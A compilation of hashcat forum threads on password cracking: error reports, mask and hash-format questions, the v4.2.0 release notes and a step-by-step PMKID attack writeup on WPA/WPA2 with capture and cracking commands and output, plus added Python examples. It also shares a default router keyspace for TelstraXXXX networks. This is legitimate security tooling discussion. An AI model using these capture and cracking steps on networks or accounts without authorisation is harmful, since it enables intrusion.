
error v4.1.0

However, I get this error on Windows 7:

v4.1.0

hashcat-4.1.0>hashcat64.exe  -m XXXX -b
hashcat (v4.1.0) starting...

./hashcat.pid: No such file or directory

./hashcat.outfiles: No such file or directory



Older hashcat v4.0.0 is working.

Hope that helps!

DiskCryptor encrypted ISO

Hello. Is it possible to brute force an ISO encrypted by DiskCryptor?
I have it encrypted with AES-Twofish-Serpent but I forgot a part of my password...

Disable Cracking performance lower than expected?

Wpa speed dropping

Hello there,

Can someone tell me why my WPA speed slows down about 30 seconds after starting? Just bought my new PC last week.
Device #1: GeForce GTX 1080, 2048/8192 MB allocatable, 20MCU

Session..........: 2018-08-01
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: C:\Program Files\HashcatGUI_1.00r3\hashcat-4.1.0\vm1.hccapx
Time.Started.....: Wed Aug 01 18:36:33 2018 (2 secs)
Time.Estimated...: Sat Aug 04 17:10:11 2018 (2 days, 22 hours)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 abcdefghjklmnpqrstuvwxyz, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   433.3 kH/s (91.33ms) @ Accel:64 Loops:128 Thr:1024 Vec:1

Session..........: 2018-08-01
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: C:\Program Files\HashcatGUI_1.00r3\hashcat-4.1.0\vm1.hccapx
Time.Started.....: Wed Aug 01 18:36:33 2018 (26 secs)
Time.Estimated...: Mon Aug 06 22:52:02 2018 (5 days, 4 hours)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 abcdefghjklmnpqrstuvwxyz, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   246.1 kH/s (91.72ms) @ Accel:64 Loops:128 Thr:1024 Vec:1

Am I missing something?

Cheers Kev

Getting both hashes cracked and not cracked in one file?

I am struggling to figure out a way to get both the cracked hashes and the uncracked hashes in one file after a cracking session.

Any ideas?

Generating dictionary

Hello
What is the best solution for generating a dictionary that cracks 8-character passwords with only capital letters (A-Z)?
I checked that this combination should be cracked in 15 days, so is it possible to generate that dictionary in parts that I can run with breaks?

I have a question about password include question mark

Hello.

My English skill is so bad. Please understand that..

I want to find my password.

So, I followed the FAQ.

The link: https://hashcat.net/wiki/doku.php?id=fre..._questions

"I have a half-known password. I know the first 4 letters, can hashcat get the rest of the password?"

I expect hashcat to find the rest of the password. I input the password like this: "zz*4$?_ XXXXXXXXXXXXXX
But in my case the password includes a ? (question mark).

The full input is
 hashcat -m 14600  -a 3 -w 3 header.luks "zz*4\$?_XXXXXXXXX@XiXoNo?a?a?a?a?"  -i --increment-min 20

Hashcat makes candidates like this:

zz*4130_ XXXXXXXXX@XiXoNo-> zz*4130_ XXXXXXXXX@XiXoNo{
But as far as I know, the first 6 letters of my password are "zz*4130...."

So, I tried changing the password input to "zz*4\$?_XXXXXXXXXXXXXX

Then a syntax error occurred.

I made various attempts but the results were the same.

How do I input it correctly if the password includes a ? (question mark)?

I really want to find the answer.

Thank you for reading my post.
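The two questions above (how to write a literal question mark in a mask, and how to split an A-Z, length-8 keyspace into parts) both come down to how a hashcat mask is read. The following Python is an added illustration, not hashcat's own code: it parses a mask into one charset per position using the documented rules (`?l ?u ?d ?s ?a ?h ?H`, custom charsets `?1`..`?4` given as `-1`..`-4`, and `??` for a literal `?`), reports the keyspace, and yields a slice of the candidates. The candidate ordering here is plain lexicographic and is an assumption for the example; hashcat's internal ordering differs, so only the counts carry over. The poster's mask ends in a lone `?`, which is exactly what the parser rejects.

```python
import itertools
import string

# Built-in hashcat charsets (as documented in the hashcat mask attack wiki page).
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def parse_mask(mask, custom=None):
    """Turn a hashcat mask into one charset string per password position.

    custom maps "1".."4" to the strings passed with -1 .. -4; those strings
    may themselves use ?l, ?d, ... and are expanded first.
    "??" stands for a literal question mark; any other plain character is a
    fixed literal at that position.
    """
    expanded = {k: "".join(parse_mask(v)) for k, v in (custom or {}).items()}
    positions = []
    i = 0
    while i < len(mask):
        ch = mask[i]
        if ch != "?":
            positions.append(ch)          # fixed literal character
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a lone '?'; write '??' for a literal ?")
        sel = mask[i + 1]
        if sel == "?":
            positions.append("?")         # escaped literal question mark
        elif sel in BUILTIN:
            positions.append(BUILTIN[sel])
        elif sel in expanded:
            positions.append(expanded[sel])
        else:
            raise ValueError(f"unknown charset selector ?{sel}")
        i += 2
    return positions


def keyspace(positions):
    """Number of candidates the mask produces: the product of the charset sizes."""
    total = 1
    for charset in positions:
        total *= len(charset)
    return total


def candidates(positions, skip=0, limit=None):
    """Yield candidates in lexicographic order, optionally only a slice of them.

    skip/limit split the keyspace into chunks that can be run one at a time,
    which is the idea behind hashcat's --skip / --limit options.
    """
    gen = ("".join(t) for t in itertools.product(*positions))
    stop = None if limit is None else skip + limit
    yield from itertools.islice(gen, skip, stop)


if __name__ == "__main__":
    # A fixed prefix containing a question mark, followed by one digit.
    print(list(candidates(parse_mask("zz*4??_?d"))))
    # Capital letters only, length 8: how big is the job?
    print("A-Z x8 keyspace:", keyspace(parse_mask("?u" * 8)))
    # The custom charset from the WPA post above (24 letters, no i/o).
    wpa = parse_mask("?1" * 8, {"1": "abcdefghjklmnpqrstuvwxyz"})
    print("custom x8 keyspace:", keyspace(wpa))
    # Third chunk of 1000 candidates from a two-digit mask's keyspace.
    print(list(candidates(parse_mask("?d?d"), skip=5, limit=3)))
```
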

Spectre/Meltdown patch a prob?

Did a quick search and came up blank.
But do the Spectre/Meltdown patches affect cracking speeds?
I've heard about performance hits all over the place (5%-30%).
Ubuntu Server 16.04.4 LTS

tia.

hashcat v4.2.0

Welcome to hashcat v4.2.0! 

Download binaries or sources: https://hashcat.net/hashcat/ 



This release is mostly about expanding support for new algorithms and fixing bugs:
  • Added hash-mode 16700 = FileVault 2
  • Added hash-mode 16800 = WPA-PMKID-PBKDF2
  • Added hash-mode 16801 = WPA-PMKID-PMK
  • Added hash-mode 16900 = Ansible Vault

Thanks to @hops_ch for contributing the Ansible Vault mode!



Improvements:
  • Added JtR-compatible support for hex notation in the rules engine
  • Added OpenCL device utilization to the status information in machine-readable output
  • Added missing NV Tesla and Titan GPU details to tuning database
  • General file handling: Abort if a byte-order mark (BOM) is detected in a wordlist, hashlist, maskfile or rulefile
  • HCCAPX management: Use advanced hints in message_pair stored by hcxtools about endian bitness of replay counter
  • OpenCL kernels: Abort session if kernel self-test fails
  • OpenCL kernels: Add '-pure' prefix to kernel filenames to avoid problems caused by reusing existing hashcat installation folder
  • OpenCL kernels: Removed the use of 'volatile' keyword in inline assembly instructions where it is not needed
  • OpenCL kernels: Switched array pointer types in function declarations in order to be compatible with OpenCL 2.0
  • Refactored code for --progress-only and --speed-only calculation
  • SIP cracking: Increased the nonce field to allow a salt of 1024 bytes
  • TrueCrypt/VeraCrypt cracking: Do an entropy check on the TC/VC header on start

Notes:
  • The removal of 'volatile' keyword has a large positive impact on cracking performance on macOS
  • The refactored code for --progress-only is important if hashcat is used in combination with a distributed overlay such as hashtopolis


Fixed Bugs:
  • Fixed a function declaration attribute in -m 8900 kernel that led to unusable -m 9300 (which shares kernel code with -m 8900)
  • Fixed a miscalculation in --progress-only mode output for extremely slow kernels like -m 14800
  • Fixed a missing check for errors on OpenCL devices leading to invalid removal of the restore file
  • Fixed a missing kernel in -m 5600 in combination with -a 3 and -O if mask is >= 16 characters
  • Fixed detection of AMD_GCN version when the rocm driver is used
  • Fixed missing code section in -m 2500 and -m 2501 to crack corrupted handshakes with a LE endian bitness base
  • Fixed a missing check for hashmodes using OPTS_TYPE_PT_UPPER causing the self-test to fail when using combinator and hybrid modes


- atom

Dictionary for long passwords - Tips and ideas

Hi,

I want to create a good dictionary as part of pen testing that attempts to crack NTLM hashes that are minimum 16 characters in length and with password complexity requirements. Do any of you have experience pen testing passwords of such a length? Any ideas on how I should proceed?

My initial thought was that people using passwords of 16+ characters in length would mostly use pass phrases (I.e. "I love my two dogs!"). So perhaps combining words in a common wordlist would be a way to go? Right now I have created a list of approx 650k+ words, names, dates etc. Would combining these be a way to go? If so, how? I see that there are several python/ruby scripts for this purpose... but I feel like I should have some kind of rules and not just combine words randomly.

I have also tried using the crackstation wordlist and running it through a filter that requires 16+ characters and password complexity, which resulted in the size going from 15 GB to 38 MB...

Any tips? I have little experience with password cracking, so any guidance will be highly appreciated!

Default router keyspace for TelstraXXXX

I have found the default keyspace for TelstraXXXX wifi networks: it is 0-9 with a length of 10. Thought I would post this here as I haven't found this anywhere else online. I don't have any pictures right now so you will have to take my word for it. Shouldn't hurt if someone tested this, as it would only take a few hours to crack.

cap to hccapx - best practices ?

Hi,

What's the practice when converting .(p)cap files to hccapx?

Some users advise cap2hccapx from hashcat-utils, while some other users advise using hcxpcaptool from ZerBea.

What's the difference between the two? What is the recommended process?

Thank you !

Noob - Understanding hashcat input format

Hello,

I'm trying to understand the hashcat input format for an HMAC-SHA256 hash.
I have read this page https://hashcat.net/wiki/doku.php?id=example_hashes many times but I do not understand the input format for HMAC-SHA256 (and more generally the input formats announced on the whole page).

Code:
(key = $pass) ...(key = $salt) ... what does it mean?


I have the hash and the salt, I want hashcat to find the key used.


I generated a test vector using python :
Code:
>>> import hashlib
>>> import binascii
>>> input = b'easy little pony'
>>> salt = binascii.unhexlify(b'e65814e4382759f85550029e723dc7e7')
>>> H = hashlib.pbkdf2_hmac('sha256', input, salt, 100000)
>>> print(binascii.hexlify(H))
b'a5c87829cadf7b75bf4a7efc19e0f39b99c5e80dc8d64109fb7a8ce40d4d8b46'

So the input I tried to give to hashcat is the following :
Code:
<hash>:<salt>

a5c87829cadf7b75bf4a7efc19e0f39b99c5e80dc8d64109fb7a8ce40d4d8b46:e65814e4382759f85550029e723dc7e7


And I have filled my dictionary with some test values, including the text "easy little pony".

I tried using this command (and all the modes from 1410 to 1460 and 10900):
Code:
hashcat -a0 -m1450 fileWithMyHash.txt myThreeWordsDictionnary.txt



Can you confirm that the mode I picked is correct?
Is the input supposed to be hex-encoded? (hash and salt)


Thank you
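The post above mixes two different constructions: the test vector was made with PBKDF2-HMAC-SHA256 (100000 chained HMAC rounds), while modes 1450/1460 are a single HMAC-SHA256 whose key is either the password candidate (`key = $pass`) or the salt (`key = $salt`). The Python below is an added example, not hashcat's code, that computes all three for a `<hash>:<salt>` line so the difference is visible; the mode numbers (1450, 1460, 10900) and the `sha256:<iterations>:<base64 salt>:<base64 digest>` layout for PBKDF2-HMAC-SHA256 are from the hashcat example-hashes page, and `check_hash_salt_line` is a name made up for this example.

```python
import base64
import hashlib
import hmac


def hmac_sha256_key_pass(password: bytes, salt: bytes) -> str:
    """HMAC-SHA256 (key = $pass), mode 1450: the candidate is the HMAC key, the salt is the message."""
    return hmac.new(password, salt, hashlib.sha256).hexdigest()


def hmac_sha256_key_salt(password: bytes, salt: bytes) -> str:
    """HMAC-SHA256 (key = $salt), mode 1460: the salt is the HMAC key, the candidate is the message."""
    return hmac.new(salt, password, hashlib.sha256).hexdigest()


def pbkdf2_sha256(password: bytes, salt: bytes, iterations: int = 100000) -> str:
    """PBKDF2-HMAC-SHA256, mode 10900: `iterations` chained HMACs, not a single one."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, 32).hex()


def check_hash_salt_line(line: str, candidate: bytes, construction) -> bool:
    """Check one '<hex hash>:<hex salt>' line against a candidate under a given construction.

    Constant-time comparison so the check itself does not leak anything when
    used in a verification service.
    """
    digest_hex, salt_hex = line.strip().split(":")
    computed = construction(candidate, bytes.fromhex(salt_hex))
    return hmac.compare_digest(computed, digest_hex.lower())


def pbkdf2_sha256_line(password: bytes, salt: bytes, iterations: int = 100000) -> str:
    """Build the 'sha256:<iterations>:<b64 salt>:<b64 digest>' line that mode 10900 expects."""
    dk = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, 32)
    return "sha256:%d:%s:%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


# The poster's own test vector, copied from the post above.
POSTED_LINE = (
    "a5c87829cadf7b75bf4a7efc19e0f39b99c5e80dc8d64109fb7a8ce40d4d8b46"
    ":e65814e4382759f85550029e723dc7e7"
)

if __name__ == "__main__":
    pw = b"easy little pony"
    for name, fn in [("1450 key=$pass", hmac_sha256_key_pass),
                     ("1460 key=$salt", hmac_sha256_key_salt),
                     ("10900 PBKDF2", pbkdf2_sha256)]:
        print(f"{name:15s} matches posted line: {check_hash_salt_line(POSTED_LINE, pw, fn)}")
    salt = bytes.fromhex(POSTED_LINE.split(":")[1])
    print("mode 10900 input line:", pbkdf2_sha256_line(pw, salt))
```

The single-HMAC modes cannot match a PBKDF2 digest no matter which of 1410..1460 is chosen; the posted vector only verifies under `pbkdf2_sha256`, and to feed it to hashcat it has to be re-encoded into the `sha256:...` form rather than `<hash>:<salt>`.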

how to take hash with winrar?

Hi, people!

I need help again.
I don't understand this method. I am investigating a RAR file. I am stuck at the first steps.
How can I take or find a hash from the RAR file that I can crack?

I tried various services but I don't understand how to do it by means of Windows.

New attack on WPA/WPA2 using PMKID

In this writeup, I'll describe a new technique to crack WPA PSK (Pre-Shared Key) passwords.

In order to make use of this new attack you need the following tools:

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called "Simultaneous Authentication of Equals" (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follows:
  • No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string



Attack details:

The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.

[Image: wireshark_pmkid.png]

The PMKID is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label "PMK Name", the access point's MAC address and the station's MAC address.

Code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector.

We receive all the data we need in the first EAPOL frame from the AP.



How to reproduce:

1. Run hcxdumptool to request the PMKID from the AP and to dump the received frame to a file (in pcapng format).

Code:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Output:

Quote:
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

If an AP receives our association request packet and supports sending PMKID we will see a message "FOUND PMKID" after a moment:

Quote:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

Note: Depending on the noise on the wifi channel it can take some time to receive the PMKID. We recommend running hcxdumptool for up to 10 minutes before aborting.

2. Run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat.

Code:
$ ./hcxpcaptool -z test.16800 test.pcapng

Output:

Quote:
start reading from test.pcapng

summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800

The content of the written file will look like this:

Quote:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

The columns are the following (all hex encoded):
  • PMKID
  • MAC AP
  • MAC Station
  • ESSID

Note: While not required, it is recommended to use the options -E, -I and -U with hcxpcaptool. We can use the resulting files to feed hashcat; they typically produce good results.
  • -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
  • -I retrieve identities from WiFi-traffic
  • -U retrieve usernames from WiFi-traffic

Code:
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

3. Run hashcat to crack it.

Basically we can attack this hash as any other hash type. The hash-mode that we need to use is 16800.

Code:
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Output:

Quote:
hashcat (v4.2.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....:  1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

There's also support for hash-mode 16801, which allows skipping the computation of the PMK, which is the computation that makes cracking WPA so slow. Pre-computing PMKs can be useful in cases where you are on site and you cannot transfer a hash to a remote cracking rig because of an NDA. The goal is to run hashcat on your notebook, which you can bring to the site.

Mode 16801 expects a list of pre-computed PMKs, as hex encoded strings of length 64, as the input wordlist. To pre-compute the PMKs you can use the hcxkeys tool. The hcxkeys tools require the ESSID, so you need to ask your client for the ESSID in advance.
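To make the formula in the writeup concrete, here is an added Python example (not hashcat's or hcxtools' code) that does the two-stage computation a mode 16800 check performs: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes), then PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA). It also parses the `PMKID*MAC_AP*MAC_STA*ESSID` line shown above and shows why mode 16801 is fast: given a PMK, only the cheap HMAC remains. This is useful for verifying a recovered passphrase against a captured line, or as a self-test when writing detections for PMKID requests. The sample line is the one from the writeup; the function names `verify_passphrase` and `verify_pmk` are made up for this example.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA/WPA2-PSK PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with the ESSID,
    4096 rounds, 32-byte output. This is the slow step that mode 16801 skips."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def hmac_sha1_128(key: bytes, data: bytes) -> bytes:
    """HMAC-SHA1 truncated to its first 128 bits (16 bytes)."""
    return hmac.new(key, data, hashlib.sha1).digest()[:16]


def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA), as in the writeup."""
    return hmac_sha1_128(pmk, b"PMK Name" + mac_ap + mac_sta)


def parse_16800(line: str) -> dict:
    """Split a hashcat 16800 line 'PMKID*MAC_AP*MAC_STA*ESSID' (all hex) into bytes."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError("expected four '*'-separated hex fields")
    pmkid_hex, ap_hex, sta_hex, essid_hex = parts
    if len(pmkid_hex) != 32 or len(ap_hex) != 12 or len(sta_hex) != 12:
        raise ValueError("PMKID must be 16 bytes and each MAC 6 bytes (hex)")
    return {
        "pmkid": bytes.fromhex(pmkid_hex),
        "mac_ap": bytes.fromhex(ap_hex),
        "mac_sta": bytes.fromhex(sta_hex),
        "essid": bytes.fromhex(essid_hex),
    }


def verify_passphrase(line: str, passphrase: str) -> bool:
    """Mode 16800 style check: derive the PMK from the passphrase, then compare PMKIDs."""
    h = parse_16800(line)
    pmk = pmk_from_passphrase(passphrase, h["essid"])
    return hmac.compare_digest(pmkid(pmk, h["mac_ap"], h["mac_sta"]), h["pmkid"])


def verify_pmk(line: str, pmk_hex: str) -> bool:
    """Mode 16801 style check: the candidate is already a 64-hex-char PMK, so PBKDF2 is skipped."""
    h = parse_16800(line)
    return hmac.compare_digest(pmkid(bytes.fromhex(pmk_hex), h["mac_ap"], h["mac_sta"]), h["pmkid"])


# The 16800 line produced by hcxpcaptool in the writeup above.
SAMPLE_LINE = (
    "2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4"
    "*ed487162465a774bfba60eb603a39f3a"
)

if __name__ == "__main__":
    fields = parse_16800(SAMPLE_LINE)
    print("AP MAC:", fields["mac_ap"].hex(), "STA MAC:", fields["mac_sta"].hex())
    pmk = pmk_from_passphrase("hashcat!", fields["essid"])
    print("PMK (what a 16801 wordlist line looks like):", pmk.hex())
    print("computed PMKID:", pmkid(pmk, fields["mac_ap"], fields["mac_sta"]).hex())
    print("passphrase matches line:", verify_passphrase(SAMPLE_LINE, "hashcat!"))
```

The ESSID field is hex because an SSID is an arbitrary byte string, not necessarily printable text; decoding it with `bytes.fromhex` rather than as UTF-8 keeps the PBKDF2 salt exactly as the AP advertised it.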

Configuration problem

Hi everyone, 

I want to test hashcat with this password, kadi1830. It's for a Mac login and the hash is this one:
E3AAD692DB9443A8A694C9DD63DD2F9CF354F27D

But it doesn't work... so I suppose my configuration is not good. Can you help me?

thanks !

https://www.cjoint.com/doc/18_08/HHevlh3...xemple.jpg

noob question

Blockchain second passwords

How can I brute force a blockchain second password?

hcxpcaptool - output possible WPA/WPA2 plainmasterkey list

Hi,
I'm quite old to hash cracking but quite new to WPA stuff, and I'm taking the new ZerBea tools release as an opportunity to learn and share.

I don't know if the hashcat forum is the best place to discuss these tools? Maybe it could feed the hcxtools GitHub wiki as well?

Anyway, here is my question:
Code:
hcxpcaptool -h
(..)
-P <file> : output possible WPA/WPA2 plainmasterkey list

-> What can I do with this output file containing PMKs?

Assumption:
I saw that the tool wlanpmk2hcx will "convert plainmasterkey and ESSID for use with hashcat hash-mode 12000".
I notice 12000 is faster than 2500.
Does it mean I can crack the password of my cap file using mode 12000 (which is faster) with the given PMK and ESSID?

Thanks.

Hybrid Wordlist + Mask 0 length mask

Hi guys,

I'm new to using hashcat so there may be a better way to do this that I don't know, but I was wondering if there is a way to do hybrid mode and check with a 0 length mask. I tried using --increment and tried setting --increment-min to 0, but it isn't a valid value; it requires 1 at the minimum. I want to be able to check against the wordlist + mask as well as just the wordlist. Is there a way to do that?

(For clarity)

Given this word list:
cat
dog

I want to check:
cat
cat0
cat1
cat2...

dog
dog0
dog1
dog2...

Thanks!